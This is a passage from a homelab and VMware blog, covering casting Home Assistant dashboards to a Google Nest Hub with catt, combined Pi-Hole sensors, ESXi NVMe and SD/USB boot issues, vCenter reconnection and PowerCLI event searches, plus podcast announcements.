Closing Comments #

Obviously, you'll want to run Caddy 2 as a service if using this in production, and the official documentation has you covered there as well. As mentioned, I am barely utilizing any of the features that Caddy has to offer; for instance, you can also use it to redirect traffic to different hosts in your DMZ or network. But for now it has covered two specific use cases for me, in a very simple manner — and I really, really, really like the automatic certificate handling that it offers!

---

# Casting Home Assistant Dashboards to Google Nest Hub 2nd Gen

URL: https://vNinja.net/2022/01/05/homeassistant-google-nest-hub-2nd-gen/
Date: 2022-01-05
Author: christian
Tags: Home Assistant, Home Automation, Node-RED

I recently bought a Google Nest Hub 2nd gen and wanted to use it as a dashboard device for Home Assistant (HA). Now, the Google Nest Hub is not really meant to be used like this, as there is no real way of installing 3rd party apps on it, such as the Home Assistant app.
Thankfully there are ways to get it to display Lovelace Dashboards from HA. One of them is the built-in Home Assistant Cast capability, but that has some requirements that I didn't like, namely that you either need to have your Home Assistant instance available from the internet, with proper certificates over HTTPS, or you need a Nabu Casa subscription (which in turn gives you the required encrypted access). I do not want my Home Assistant instance to be available at all from outside of my local network; if I need access to it when I'm not at home, I use other connection methods to get access to my local home network. The option I went for was utilizing Cast All The Things (catt). Simply put, catt enables casting of both local and remote URLs to compatible devices, and it even works with http traffic locally.

Installing Cast All The Things #

I opted, after trying different things, to go for running catt in an Ubuntu instance I already had running in my Home Lab.

Installing catt prerequisites (can be skipped if these are already in place) #

```
sudo apt install python3-pip python3-setuptools
```

Installing catt #

```
pip3 install --user catt
```

Once catt is installed, it enables a lot of options:

```
Usage: catt [OPTIONS] COMMAND [ARGS]...

Options:
  -d, --device NAME_OR_IP  Select Chromecast device.
  --version                Show the version and exit.
  -h, --help               Show this message and exit.

Commands:
  add           Add a video to the queue (YouTube only).
  cast          Send a video to a Chromecast for playing.
  cast_site     Cast any website to a Chromecast.
  clear         Clear the queue (YouTube only).
  del_alias     Delete the alias name of the selected device.
  del_default   Delete the default device.
  ffwd          Fastforward a video by TIME duration.
  info          Show complete information about the currently-playing video.
  pause         Pause a video.
  play          Resume a video after it has been paused.
  play_toggle   Toggle between playing and paused state.
  remove        Remove a video from the queue (YouTube only).
  restore       Return Chromecast to saved state.
  rewind        Rewind a video by TIME duration.
  save          Save the current state of the Chromecast for later use.
  scan          Scan the local network and show all Chromecasts and their IPs.
  seek          Seek the video to TIME position.
  set_alias     Set an alias name for the selected device (case-insensitive).
  set_default   Set the selected device as default.
  skip          Skip to end of content.
  status        Show some information about the currently-playing video.
  stop          Stop playing.
  volume        Set the volume to LVL [0-100].
  volumedown    Turn down volume by a DELTA increment.
  volumeup      Turn up volume by a DELTA increment.
  write_config  DEPRECATED: Please use "set_default".
```

Preparing Home Assistant #

Creating a dedicated User #

Next, I created a dedicated user for the Google Nest Hub in HA, without administrator access.

Dedicated HA user for Nest Hub

Allowing bypass login #

Since there is no keyboard on the Nest Hub, typing in a password for a user account is problematic. In order to bypass that, some changes need to be made to the Home Assistant configuration.yaml file. Under homeassistant: I added the following:

```
auth_providers:
  - type: trusted_networks
    allow_bypass_login: True
    trusted_networks:
      - <Google Nest Hub IP Address>
  - type: homeassistant
```

Basically this allows the Nest Hub to log into HA without providing a password, given that it comes from the <Google Nest Hub IP Address>. When the Nest Hub opens HA for the first time, you select one of the available user accounts from a list, and select to remember that user for subsequent logins. It then logs the device in without asking for a password. I could also have used the trusted_users option, but I haven't explored how that works yet. For details on how this works, check the Home Assistant Authentication Providers documentation.

Creating Nest Hub specific Lovelace Dashboards #

Next up was creating some Nest Hub specific dashboards.
I created new Lovelace Dashboards specifically for this, since my normal browser-based ones are way too crowded to show on a small touch-based device. In the end, I ended up with a new touch-optimized dashboard named Touch, with three views: Main, Lighting, and Playing. Switching between them is as easy as touching the icon for each view on the top row. In order to get a coherent and touch-friendly dashboard, these rely heavily on nested Grid Cards. The yaml files for these are available here:

- main.yaml
- lighting.yaml
- playing.yaml

Main View #

This view contains a top row that shows time and date, and a second row with some buttons: Night Mode, Away Mode, Party Mode, Alarm Status and AC Control. The mode buttons I use for other automations in Node-RED. When Night Mode is enabled, a bunch of lights are all turned off (while others stay on), Away Mode ensures that some things do not happen automatically when we are away, and Party Mode overrides automations that turn off other entities at predefined times, plus a few other things. Alarm Status basically just shows if the alarm system is enabled or not (and lets us turn it on/off from the panel), and the AC Control button allows for setting the thermostat, heating/cooling mode, etc., as well as showing the current status. Below that is a row of gauges that show indoor temperature, outdoor temperature, current power usage, indoor humidity and the current indoor CO2 measurements.

Lighting View #

This view is pretty self-explanatory: it controls lights. I've only included a subset of the lights here, as these are the ones on the floor where the Nest Hub is located.

Playing View #

This view just shows a standard Home Assistant Media Player connected to my Spotify account. This view is mainly used in the Node-RED automations.
catt scripts #

As mentioned, I use catt to cast these Lovelace Dashboards to the Nest Hub, and doing so is pretty simple:

```
catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/0
```

This casts my Main View to the Nest Hub, and after the initial login this works very nicely indeed. However, after 10 minutes the Nest Hub goes into sleep mode and stops the cast. It does not seem like the Nest Hub detects that the gauges change frequently, or that the clock updates. In order to bypass that, I decided to use Node-RED in HA to start casting every 9 minutes. Now, this is somewhat annoying as it forces a re-cast to the device, which redraws the display entirely, but I haven't found any other way to work around it. If someone knows how to disable sleep mode on a Nest Hub 2nd Gen, please let me know! At the time of writing, the Nest Hub 2nd Gen was running firmware version 276689, Cast firmware version 1.56.27669, with catt v0.12.5. I have seen others that have had problems with the display timing out or sleeping after 30 seconds, but I have not seen that on my device.
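For reference, the periodic re-cast does not have to be driven from Node-RED; a plain shell loop (or a cron job) on the VM that runs catt can do the same. A minimal sketch, using the same placeholder device and dashboard address as the cast_site command above:

```shell
# Re-issue the cast every 9 minutes, staying just under the Nest Hub's
# 10-minute sleep timeout. Device IP and HA address are placeholders.
recast_dashboard_loop() {
    while true; do
        catt -d "<Google Nest Hub IP Address>" cast_site "http://<Internal HA IP/DNS Name>:8123/lovelace-touch/0"
        sleep 540  # 9 minutes
    done
}
```

I drive this from Node-RED instead, as mentioned, but the loop shows the timing logic.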
I have created two simple bash scripts on the VM that catt runs on: catt-dash0.sh #!/bin/bash # Grab existing volume value (This is hacky, since the output from status only shows the value for volume if there is no video playing) nestvolume=$(/home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> status) nestvolume=${nestvolume:8} # Cast specific lovelace dashboard from HA /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> stop /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume 0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume $nestvolume catt-dash-spotify.sh #!/bin/bash # Grab existing volume value (This is hacky, since the output from status only shows the value for volume if there is no video playing) nestvolume=$(/home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> status) nestvolume=${nestvolume:8} # Cast specific lovelace dashboard from HA /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> stop /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume 0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/playing /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume $nestvolume Both scripts first grab the existing volume setting from the Nest Hub and store that value in the nestvolume variable, stop any existing cast, and then set the volume to 0, which is the same as mute. This is done because if the volume is on, the Nest Hub plays a sound when you start casting to it. Since I restart the casting every 9 minutes due to the sleep problem mentioned above, this gets annoying very quickly. They then start a new cast of a specific dashboard/view, before setting the volume back to whatever value it was set to before the script ran. 
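The `${nestvolume:8}` substring trick above slices a fixed offset off the status output, which breaks if the output format shifts. A slightly more defensive parse could key on the line itself. This is a sketch under an assumption: that `catt ... status` prints a line like `volume: 35` (verify against your own catt version first); the sample string below stands in for the live call:

```shell
#!/bin/bash
# Assumed sample of `catt -d <ip> status` output -- on a live system you
# would instead capture it with:
#   status_output=$(/home/<username>/.local/bin/catt -d <ip> status)
status_output='volume: 35
volume_muted: False'

# Pull the number after "volume:" instead of slicing a fixed offset.
nestvolume=$(printf '%s\n' "$status_output" | awk -F': ' '/^volume:/ {print $2; exit}')
echo "$nestvolume"
```

Keying on the `volume:` label keeps the scripts working even if extra lines appear before it in the status output.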
These two scripts are the basic ones I use for now, and I call them via Node-RED. Node-RED Automation # To overcome the problem with the Nest Hub sleeping, I have created a Node-RED flow that starts casting every 9 minutes. In addition, I check if something is playing on a Volumio with HiFiBerry instance I have running; if that is the case, the Playing View is cast, and if not, the default Main View is shown. This is done with the node-red-contrib-bigssh node, which allows Node-RED to connect to a remote machine via SSH and run commands: bigssh-node config Spotify The entire flow looks like this: Node-RED Flow The Spotify Cast node calls the catt-dash-spotify.sh script, and the Default Cast node calls catt-dash0.sh. The Timestamp node just repeats every 9 minutes, to ensure casting. All in all, it looks like this when it all works together: And this, auto switching Lovelace Dasboards based on events in HA, via Node-RED. https://t.co/6jin0hsNnN pic.twitter.com/ygihyqxwyB — Christian Mohn™ (@h0bbel) January 3, 2022 Over time I’m sure I’ll work out other methods and use cases for this, but for now this works very well. It’s nice to have a small, stylish, fully touch-enabled display where the most commonly used buttons are easily available. This is a bit of a hack, with quite a few moving parts, and in the long run I think most people will be happier running this on a cheap-ish Android tablet with the native Home Assistant App on it, instead of casting Lovelace Dashboards to a Google Nest Hub. --- # Combined Pi-Hole Statistics in Home Assistant URL: https://vNinja.net/2021/11/08/combined-pi-hole-stats-in-home-assistant/ Date: 2021-11-08 Author: christian Tags: Home Assistant, Home Automation, Pi-Hole I have been running Pi-Hole since 2018, and I’m still amazed at how many ads it actually blocks. It’s simply incredible, and I often run my VPN client on my phone to connect to my home network, just to get DNS filtering no matter where I am. 
Due to some recent changes to my home environment, I have now moved to a dual Pi-Hole setup, utilizing Michael Stanclift’s excellent Gravity Sync to keep the Gravity blocklists synchronized between instances. I am also a heavy user of Home Assistant, so naturally I have statistics from Pi-Hole visible in a Dashboard there as well, utilizing the Pi-Hole integration, which works very well. However, with two Pi-Hole instances, I would like to see some combined statistics, instead of them being separated out by instance. Thankfully this is very easy to do in Home Assistant, by creating custom template sensors. In my setup, I have two Pi-Hole integrations enabled, one called pi_hole and one called pi_hole02. In order to combine some of the sensors, it’s a matter of creating a new combined sensor with the total values. Pi-Hole Combined Sensors example # Stick this in your Home Assistant configuration.yaml file, replace the sensor_pi_hole names with your own entity names, and you’ll be able to use two new sensors, namely total_ads_pihole, which is a combination of the ads blocked in the last 24 hours by both Pi-Hole instances, and total_pi_hole_dns_queries_cached, which is the total number of cached queries. Add those to an Entities Card in Home Assistant, and you will have something that looks like this: --- # Hot Add NVMe Device Caused PSOD on ESXi URL: https://vNinja.net/2021/09/08/hot-add-nvme-device-caused-psod-on-esxi/ Date: 2021-09-08 Author: stine Tags: ESXi, VMware, vSphere, NVMe I recently had a case of “go with your gut” when we added some new NVMe disks to an existing VMware vSAN solution at a customer. Normally I’m very cautious and will put hosts into maintenance mode, no matter how small the hardware change I’m doing is, but against my better judgement this time I decided to hot add some disks (which of course is supported). 
However, I fumbled and managed to insert a disk, quickly remove it, and insert it again, and ended up with a dreaded Purple Screen of Death (PSOD) on the host. Naturally this freaked me out and I was eager to figure out what the problem was. Searching through the KBs at VMware didn’t give me any clues, but a quick Google search took me to the ESXi 7.0u2c Release Notes: “PR 2708326: If an NVMe device is hot added and hot removed in a short interval, the ESXi host might fail with a purple diagnostic screen. If an NVMe device is hot added and hot removed in a short interval, the NVMe driver might fail to initialize the NVMe controller due to a command timeout. As a result, the driver might access memory that is already freed in a cleanup process. In the backtrace, you see a message such as WARNING: NVMEDEV: NVMEInitializeController:4045: Failed to get controller identify data, status: Timeout. Eventually, the ESXi host might fail with a purple diagnostic screen with an error similar to #PF Exception … in world …:vmkdevmgr. This issue is resolved in this release.” Luckily, there were no more errors after hot adding the disks and rebooting the host, so the next step is of course some patching. I did not experience the same issue on any of the other hosts in that cluster, probably due to steadier hands or less caffeine in my bloodstream. --- # ESXi SD-Card/USB boot devices unsupported in 7.0u3 URL: https://vNinja.net/2021/09/02/esxi-sd-card-usb-boot-device-unsupported-in-7.0u3/ Date: 2021-09-02 Author: christian Tags: ESXi, VMware, vSphere In the ongoing saga of SD-Card/USB boot device support in ESXi, VMware has just published a new KB article named “Persistent storage warnings when booting ESXi from SD-Card/USB devices. (85615)” outlining that from 7.0u3 (at the time of writing, not released yet) onward, support for such boot devices is deprecated. As of 03. September 2021 the Persistent storage warnings when booting ESXi from SD-Card/USB devices. 
(85615) KB article has been removed from kb.vmware.com for unknown reasons. Hopefully it will be back soon. Update 16. September 2021: A new KB article has been published: Removal of SD card/USB as a standalone boot device option (85685). This article outlines that from the next major version after 7.x, using a standalone SD card/USB device will be unsupported, with the following notice: “VMware strongly advises that you move away completely from using SD card/USB as a boot device option on any future server hardware.” ESXi requires local persistent storage for operating system use, to store system state, configuration, logs, and live data. A system with only a SD-Card/USB boot device is operating in an unsupported state with the potential for premature corruption. They also list the workarounds for this as either installing to a non SD/USB device, or adding a persistent storage device. Additional information can also be found in Boot device guidance for low endurance media (vSphere and vSAN) (82515), which somewhat contradictorily states that upgrades will still be supported in 7.x: “For all upgrades ESXi 7.0 onwards, we continue to support existing boot devices.” I have a suspicion that this is 7.x specific, that it will change in a future version, and that ESXi might not even install on SD-Cards and USB thumb drives at some point. While I completely support and understand why VMware is doing this, and I would never recommend anyone running their production vSphere environments on hosts booting from SD-Card/USB boot devices, this might be an issue for homelab setups, especially those running vSAN. While small form factor nodes, like the Intel NUC, are inherently unsupported by VMware anyway, the new requirement of having a location to place the ESXi OS Data might be a problem. 
Many small form factor setups only allow two internal devices, typically one M.2 and one SATA3 device, and since vSAN requires a minimum of one cache drive and one capacity drive per disk group, this might be a problem for many small setups. One alternative is booting the hosts from a resilient external USB drive (HDD/SSD/NVMe) in an enclosure, since using a USB device isn’t the real problem, but rather that the resiliency of the NAND chips on an SD-card or USB thumb drive isn’t suited for the storage scheme and layout introduced in ESXi 7.0. Another possibility is using USB storage for vSAN, or even using something like a Raspberry Pi as an iSCSI target; either way you’ll need something outside of the vSAN cluster hosts themselves to ensure ESXi keeps running. Just like with everything else, plan accordingly. I do applaud VMware for being transparent about this. Publishing the new KB article before ESXi 7.0u3 is released is also good, although that part seems to have been premature, since the KB has since been pulled from the public. I also think removing support for a boot option in an update release, and not a major release, is a bit strange. Anyone who is still running production vSphere hosts on SD-Cards/USB thumb drives needs to take action as soon as possible to ensure support going forward. I am sure further guidance will be given before the 7.0u3 update is released, especially now that the original KB has been pulled. --- # Upgrading to ESXi 7.0 build 18426014 U2c. ESXi stuck in Not responding from vCenter URL: https://vNinja.net/2021/08/24/upgrading-to-esxi-7.0-build-18426014-u2c-esxi-stuck-in-not-responding-from-vcenter/ Date: 2021-08-24 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. 
Well, not directly related to the new ESXi 7 U2c build, BUT if you’re one of the lucky ones (like me), you’ve been experiencing big issues with SD/USB devices since ESXi U1/U2, meaning the vCenter <> ESXi communication (at least the configurations, tokens, etc.) has not been working for a while. I mean, the last time vCenter talked successfully with my host was back in May 2021, when the USB dropped. That’s like four (4!) months ago. Today, VMware finally released ESXi 7 U2c, which includes an updated vmkusb module. Hopefully this will fix the previously experienced SD/USB device issues, but before that - let’s talk patching! Patch plan - quick & dirty # As both LCM/VUM and esxcli are currently unable to patch ESXi while the USB is in its current “broken” state (due to the SD/USB issues), I planned to perform a quick reboot on the ESXi hosts, to first make the USB (boot device) accessible again, then proceed with patching, which should work (in theory), as it is then able to update the images (VIBs) on the USB device. What happened # Verify USB/boot device not working, before proceeding with reboot [root@esx-13:~] df -h Error when running esxcli, return status was: 1 Errors: Cannot open volume: [root@esx-13:~] partedUtil getptbl /dev/disks/mpx.vmhba32\:C0\:T0\:L0 Unable to get device /dev/disks/mpx.vmhba32:C0:T0:L0 Comment: So yeah, this server needs a reboot first, before it is able to talk to the boot device, which is USB (in my case listed as vmhba32). So I rebooted the host. Checking Intel AMT/KVM, the host booted up again, still on ESXi 7 U2a - build 17867351 (with the bug). I waited a little, but it never re-connected in VMware vCenter. VMware vCenter was still showing the host as “Not responding” - but the host was actually back up and running. 
So I quickly jumped into a SSH session on the host, and first verified that the bootbank & VMFS-L/OSDATA was available, and it was (hence, should be able to patch) [root@esx-13:~] df -h Filesystem Size Used Available Use% Mounted on VMFS-L 20.8G 1.6G 19.1G 8% /vmfs/volumes/LOCKER-6092997b-cd2ada42-23c0-000c292b45b0 vfat 4.0G 202.7M 3.8G 5% /vmfs/volumes/BOOTBANK1 vfat 4.0G 208.3M 3.8G 5% /vmfs/volumes/BOOTBANK2 vsan 5.5T 1.8T 3.6T 34% /vmfs/volumes/mgmt-01-vsan While manually reviewing vmkernel.log on the ESXi, I suddenly got this little alert - which originates from vRLI, sent to me via webhook, into my Slack-channel for monitoring. So I jumped into vRLI, to verify, and yeah, the hostd process on the newly rebooted ESXi host throws a “vRealize Log Insight Error” For a little more details, I manually checked the hostd.log under /var/log/hostd.log on the ESXi host, and I saw this 2021-08-24T15:11:00.907Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Activation [N5Vmomi10ActivationE:0x00000010f9616270] : Invoke done [login] on [vim.SessionManager:ha-sessionmgr] 2021-08-24T15:11:00.907Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg userName: --> "vpxuser" 2021-08-24T15:11:00.908Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg password: --> (not shown) --> 2021-08-24T15:11:00.908Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg locale: --> "" 2021-08-24T15:11:00.908Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Throw vim.fault.InvalidLogin 2021-08-24T15:11:00.908Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Result: --> (vim.fault.InvalidLogin) { --> msg = "", --> } 2021-08-24T15:11:07.909Z error hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] [module:pam_lsass]pam_do_authenticate: error [login:vpxuser][error code:2] 2021-08-24T15:11:07.909Z error hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] [module:pam_lsass]pam_sm_authenticate: 
failed [error code:2] 2021-08-24T15:11:07.909Z warning hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] Rejected password for user vpxuser from 127.0.0.1 2021-08-24T15:11:07.910Z info hostd[1052023] [Originator@6876 sub=Vimsvc.ha-eventmgr opID=HostSync-host-4384-351d8304-de-1bb3] Event 148 : Cannot login vpxuser@127.0.0.1 2021-08-24T15:11:07.911Z info hostd[1051983] [Originator@6876 sub=Vimsvc.TaskManager opID=7ccb1bb5 user=vpxuser] Task Created : haTask--vim.event.EventHistoryCollector.readNext-150 2021-08-24T15:11:07.911Z info hostd[1052127] [Originator@6876 sub=Vimsvc.TaskManager opID=7ccb1bb5 user=vpxuser] Task Completed : haTask--vim.event.EventHistoryCollector.readNext-150 Status success For fun, I re-tried restarting the hostd & vpxa services, but I got the same issue. Basically, the ESXi host was not able to successfully re-connect in vCenter automatically (like it usually does). Quickfix # Well, it’s an easy one this time - just re-connect (duh!). Doing a new “Connect” from vCenter first gives you an error on re-connecting, then a new login prompt. Re-enter the credentials for the host, and boom - back online in vCenter. You may now patch your babies to the latest ESXi 7.0 build 18426014 U2c, hopefully fixing the SD/USB issues permanently. --- # On the Line with Cohesity Podcast Episode 42: Back to Travel and VMworld 2021 with Christian Mohn URL: https://vNinja.net/2021/08/04/on-the-line-cohesity-podcast/ Date: 2021-08-04 Author: christian Tags: Podcast, Cohesity As timing will have it, two podcasts I’ve been a guest on have been released this week. This time it is On The Line with Cohesity — Episode 42: Back to Travel and VMworld 2021 with Christian Mohn. Description # In this Episode of On The Line, Chris Colotti and Patrick Redknap discuss the upcoming VMworld 2021 virtual event with community member and vExpert Christian Mohn. 
The trio talks about their hopes for what has changed since 2020, and some ideas on how to get local groups of people together for viewing parties. Check it out in Apple Podcasts, Spotify or blubrry. --- # The On-Premise IT Roundtable Podcast: It’s Time to Embrace the Bottlenecks in Storage URL: https://vNinja.net/2021/08/03/the-on-premise-it-roundtable-podcast/ Date: 2021-08-03 Author: christian Tags: Podcast, YouTube, Storage I’ve recently had the opportunity to join The On-Premise IT Roundtable Podcast for a discussion about storage and bottlenecks, titled “It’s Time to Embrace the Bottlenecks in Storage”. Have a listen, or watch, for a fun discussion about storage, bottlenecks, application proximity and aliens! Podcast Description # Storage administration has always been about fighting bottlenecks, but today’s architecture means it’s time to embrace them instead. In this episode, our panel discusses the premise that it’s most important to match bottlenecks to the position in the infrastructure stack and application. One reason for this is the amazing bandwidth and low latency we have, thanks to Optane PMEM, NVMe, flash, and other technologies, but another is the emergence of new technologies that enable disaggregated architecture, moving storage closer to the application. Watch the recording on YouTube below, or visit the Gestalt IT site for the audio-only version. Panelists Christian Mohn Rob Koper David Klee Moderator Stephen Foskett --- # Storage Field Day #22 — Here We Go URL: https://vNinja.net/2021/07/30/sfd22-here-we-go/ Date: 2021-07-30 Author: christian Tags: Tech Field Day, Storage Field Day Next week is Storage Field Day 22, and for the first time since Tech Field Day 6, 10 years ago, I am a delegate! I am really looking forward to hearing from the presenting sponsors, and to being part of what looks like a really great group of delegates. 
Presenting Sponsors # infrascale FUJIFILM ctera Intel Komprise Pure Delegates (Twitter) # Brandon Graves Dan Frith David Klee Enrico Signoretti Erik Ableson Jason Benedicic Mikael Korsgaard Jensen Ray Lucchesi Rob Koper Wolfgang Stief Agenda # Handy ical link for all the Storage Field Day 22 presentations Day Time Sponsor Presenters Wednesday, Aug 4 8:00-9:30 Infrascale n/a Wednesday, Aug 4 11:00-13:30 Intel Allison Goodman, Elsa Asadian, Kelsey Prantis, Kristie Mann, Nash Kleppan, Sagi Grimberg Thursday, Aug 5 8:00-10:00 CTERA Aron Brand, Jim Crook, Liran Eshel Thursday, Aug 5 11:00-13:00 Komprise Krishna Subramanian, Mike Peercy, Mohit Dhawan Friday, Aug 6 8:00-9:00 Fujifilm n/a Friday, Aug 6 10:00-11:30 Pure Storage Ralph Ronzio, Stan Yanitskiy Note: All dates and times listed are local time in Silicon Valley, US/Pacific. Join us live for what should be an awesome event! --- # vSoup Is Back! URL: https://vNinja.net/2021/06/30/vsoup-is-back/ Date: 2021-06-30 Author: christian Tags: Podcast, vSoup, YouTube After a rather prolonged hiatus, the vSoup Podcast is back! For the first time since March 2017, Ed, Chris and myself got together and recorded something. This time we even had our cameras on while recording, which we’ve never done before. Coincidentally, 2021 is also the ten-year anniversary of the first vSoup episode, which was released January 4th, 2011. In short, we just turned our cameras on and had a quick chat for about 20 minutes. So here it is, vSoup Reloaded — Episode 1: --- # ESXi 7.0 SD Card/USB Drive Issue Temporary Workaround URL: https://vNinja.net/2021/06/01/esxi-7.0-sd-card-issue-temporary-workaround/ Date: 2021-06-01 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. 
As VMware has not released a fix yet (regarding the issues with SD cards and USB drives), I’m still experiencing issues with ESXi 7.0 U2a Potentially Killing USB and SD drives on hosts running from USB or SD card installs. As the previous workaround (copying VMware Tools to a RAMDISK with the ToolsRamdisk option) only worked for 8 days (in my case), I needed something more “permanent”, to get the ESXi hosts more “stable” (e.g. the host being able to enter maintenance mode, move VMs around, snapshots/backup, doing CLI-stuff/commands, etc.). Stopping the “stale IOs” against vmhba32 makes ESXi happy again # As I previously just yanked out my USB device (which also works, by the way), I needed something more remote-friendly. As mentioned other places, a combination of esxcfg-rescan -d vmhba32 and restarting the services/processes currently using the device (vmhba32) frees up the “stale/stuck IOs”, and ESXi is “happy again” (most things seem to be working fine, as VMware ESXi runs fine from RAM). That said, any “permanent configuration changes” to ESXi, etc. will not work, as all IOs against the device (which stores the changes) are failing. This includes trying to patch the host. The device is, in other words, marked as failed, with APD/PDL (which I’m guessing is why the host is somewhat working again: not trying any IOs against the vmhba32 device equals no timeouts, and no timeouts equals working processes, etc. - wild guess). A quick reboot seems to make the drive work again, luckily. But only until the issue resurfaces (hours or days, in my experience so far). Checking the possible options for esxcfg-rescan # [root@esx-14:~] esxcfg-rescan -h esxcfg-rescan <options> <adapter> -a|--add Scan for only newly added devices. -d|--delete Scan for only deleted devices. -A|--all Scan all adapters. -u|--update Scan existing paths only and update their state. -h|--help Display this message. 
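The rescan-plus-restart combination described above can be strung together in one place. This is a hedged sketch, not a tested procedure: the `localcli` output below is a canned sample (so the parsing step can actually be shown), and on a live ESXi host you would capture it with the real command instead, then restart each listed holder:

```shell
#!/bin/bash
# Hypothetical consolidation of the stale-IO workaround. The device name and
# the canned world list are samples from this post, not live output.
DEV="mpx.vmhba32:C0:T0:L0"

# Sample of: localcli storage core device world list
world_list='Device World ID Open Count World Name
mpx.vmhba32:C0:T0:L0 1051918 1 hostd
mpx.vmhba32:C0:T0:L0 1424916 1 localcli'

# Extract the names of the worlds still holding the dead device open
# (first column is the device, last column is the world name).
holders=$(printf '%s\n' "$world_list" | awk -v d="$DEV" '$1 == d {print $NF}')
echo "$holders"

# On a live host the full sequence would be roughly:
#   esxcfg-rescan -d vmhba32                   # drop the dead paths
#   /etc/init.d/hostd restart                  # restart each holder found above
#   localcli storage core device world list    # re-check until the list is empty
```

The point of parsing the world list first is that you only restart the services actually pinning the device, instead of bouncing everything.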
Running esxcfg-rescan -d on the device that has issues # In my case, it’s vmhba32 [root@esx-14:~] esxcfg-rescan -d vmhba32 Rescan complete, however some dead paths were not removed because they were in use by the system. Please use the 'storage core device world list' command to see the VMkernel worlds still using these paths. Check for any process (worlds) currently using the device # [root@esx-14:~] localcli storage core device world list|egrep -ie '(device|mpx)' Device World ID Open Count World Name mpx.vmhba32:C0:T0:L0 1051918 1 hostd mpx.vmhba32:C0:T0:L0 1424916 1 localcli Here we see that device mpx.vmhba32:C0:T0:L0 is being used by hostd (with PID 1051918) Tip: You may also just run the command localcli storage core device world list, and check the output. I simply added a filter on device & mpx only, to limit output. Restart hostd, if needed (or any other processes locking the device) # [root@esx-14:~] /etc/init.d/hostd restart watchdog-hostd: Terminating watchdog process with PID 1051906 1051182 hostd stopped. /usr/lib/vmware/hostd/bin/create-statsstore.py:30: DeprecationWarning: pyvsilib is replaced by vmware.vsi import pyvsilib as vsi hostd started. Re-check if any process is still using the device # [root@esx-14:~] localcli storage core device world list|egrep -ie '(device|mpx)' Device World ID Open Count World Name Note: After restarting the hostd process in my case, I needed to wait another 2-3 minutes, sometimes, before the world was actually stopped, and the process was no longer using vmhba32 (guessing another timeout). Results # Commands like df -h etc. should now work, and you may set the host in maintenance mode, completing vMotion & evacuating VMs as usual (which was stuck before), or do “CLI stuff”. Other procedures which might have failed before, now may start working again. So after vmhba32 is “flagged as failed”, you may Enter maintenance mode, if needed. Evacuate VMs/vMotion, etc, as usual. Take snapshots of VMs. Pre-checks (scripts) work. 
Do CLI commands (which previously got stuck). Reboot the host. Also: After VMware releases a fix for this, I simply plan to reboot the host first (which makes the device work again), then apply the patch, etc. Hopefully it won’t be that long until a fix is released. For now, I’ll apply this “workaround” in my environment, which seems better than stale IOs against the ESXi host, including the repercussions (failing processes), possible multiple reboots needed, etc. --- # Searching vCenter Tasks and Events via PowerShell and GridView URL: https://vNinja.net/2021/05/19/searching-vcenter-tasks-and-events-via-powershell/ Date: 2021-05-19 Author: Tags: PowerCLI, vCenter, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. As searching and filtering for events in vCenter Server through the vSphere Client is somewhat limited (OK, it really sucks, to be honest), it’s usually much faster to use PowerCLI to retrieve, filter and search events. The basics. Connecting to vCenter Server via PowerCLI, and getting some events # Connecting to vCenter Connect-VIServer vc-02.esod.local Getting the last 1337 events from vCenter Get-VIEvent -MaxSamples 1337 Getting the last 1337 events from an ESXi host Get-VMHost esx-11.esod.local | Get-VIEvent -MaxSamples 1337 Getting the last 1337 events from a VM Get-VM dc-02.esod.local | Get-VIEvent -MaxSamples 1337 Knowing there is more… # Since this is basically PowerShell output, you may filter it in any way you like through regular PowerShell, as you might already know. Check all the objects I may retrieve, just for the first event. 
